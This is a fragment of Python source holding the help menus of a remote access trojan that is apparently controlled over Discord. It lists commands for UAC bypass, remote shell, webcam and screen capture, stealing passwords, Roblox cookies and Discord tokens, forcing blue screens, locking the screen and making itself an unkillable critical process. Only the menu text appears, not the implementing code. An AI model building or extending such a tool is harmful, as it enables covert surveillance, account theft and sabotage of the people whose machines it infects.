help_menu = f"""
Available commands for **{os.getlogin()}** :
**!help** โ - Shows this message
**!startup** ๐ - Adds the file to startup.
**!exit** โ - Stop the RAT from working.
**!usagelist** ๐ - Returns a list of active users.
**!admin_check** ๐ก๏ธ - Checks if you are admin on target computer.
**!bypass_uac** ๐ - Attempts to bypass UAC to get admin privileges.
**!shell** ๐ป - Run a shell command
`-----SURVEILLANCE-----` ๐
**!screenshot** ๐ธ - Sends a screenshot of the target machine
**!idletime** โณ - Displays for how long the user has been AFK
**!webcam_capture** ๐ท - Capture a picture of the webcam.
**!tasklist** ๐ - Returns a list of active tasks.
`-----FILE MANAGEMENT-----` ๐๏ธ
**!chdir** ๐ - Changes the current directory. **!chdir <** to go back one directory.
**!chdisk** ๐ฝ - Changes the current disk. (E, C, D, etc.)
**!ls** ๐ - Displays all items in the current directory.
**!download** โฌ๏ธ - Downloads a file from the specified path.
**!upload** โฌ๏ธ - Uploads a file to the specified path.
**!taskkill** โ๏ธ - Kills the specified task.
**!startfile** โถ๏ธ - Starts a file.
**!delfile** ๐๏ธ - Deletes a file.
**!hidefile** ๐ต๏ธโโ๏ธ \ **!unhidefile** ๐๏ธ - Hides/unhides a file.
`-----INFORMATION GATHERING-----` ๐ต๏ธโโ๏ธ
**!whois** ๐ค - Prints the user's name
**!getip** ๐ - Gets the current user's IP address
**!clipboard** ๐ - Returns a string of the user's clipboard.
**!grabpasswords** ๐ - Steal all the passwords from the device.
**!grabroblox** ๐ฎ - Grabs the user's Roblox account cookie.
**!hardware_list** ๐ก - Lists the user's hardware on newlines.
"""
help_menu2 = """
**!grabdiscord** ๐ฌ - Fetches the user's Discord account token.
`-----SANCTIONING-----` ๐จ
**!bsod** ๐ฅ - Blue screens the computer.
**!disabletaskmgr** \ **!enabletaskmanager** ๐ซ \ โ
- Disable/enable task manager.
**!logoff** ๐ช - Logs the user off.
**!shutdown** ๐ด - Shuts the user's PC off.
**!restart** ๐ - Restarts the user's PC.
**!blockscreen** ๐ซ - Blocks the user's screen. (IRREVERSIBLE UNTIL USER RESTARTS)
**!critproc** โ ๏ธ - Makes the RAT a critical process, meaning if it's task killed the user will get a BSOD.
**!screenflip** ๐ - Rotates the user's screen 90 degrees.
`-----FUN-----` ๐
**!write** โ๏ธ - Writes a sentence then presses enter.
**!setclipboard** ๐ - Sets the clipboard to the specified string of text.
**!forcedesktop** ๐ฅ๏ธ - Sends the user on desktop automatically.
**!messmouse** ๐ฑ๏ธ - Shakes the user's cursor when they try to move the mouse, run this command again to stop.
**!opensite** ๐ - Opens a site on the user's browser.
**!key_press** โจ๏ธ - Press a key.
**!showtaskbar** ๐ฅ๏ธ \ **!hidetaskbar** ๐
`-----COMMUNICATION-----` ๐
**!questionmsg** โ - Sends the user a question message.
**!warningmsg** โ ๏ธ - Sends the user a warning message.
**!errormsg** โ - Sends the user an error message.
**!infomsg** โน๏ธ - Sends the user an informative message.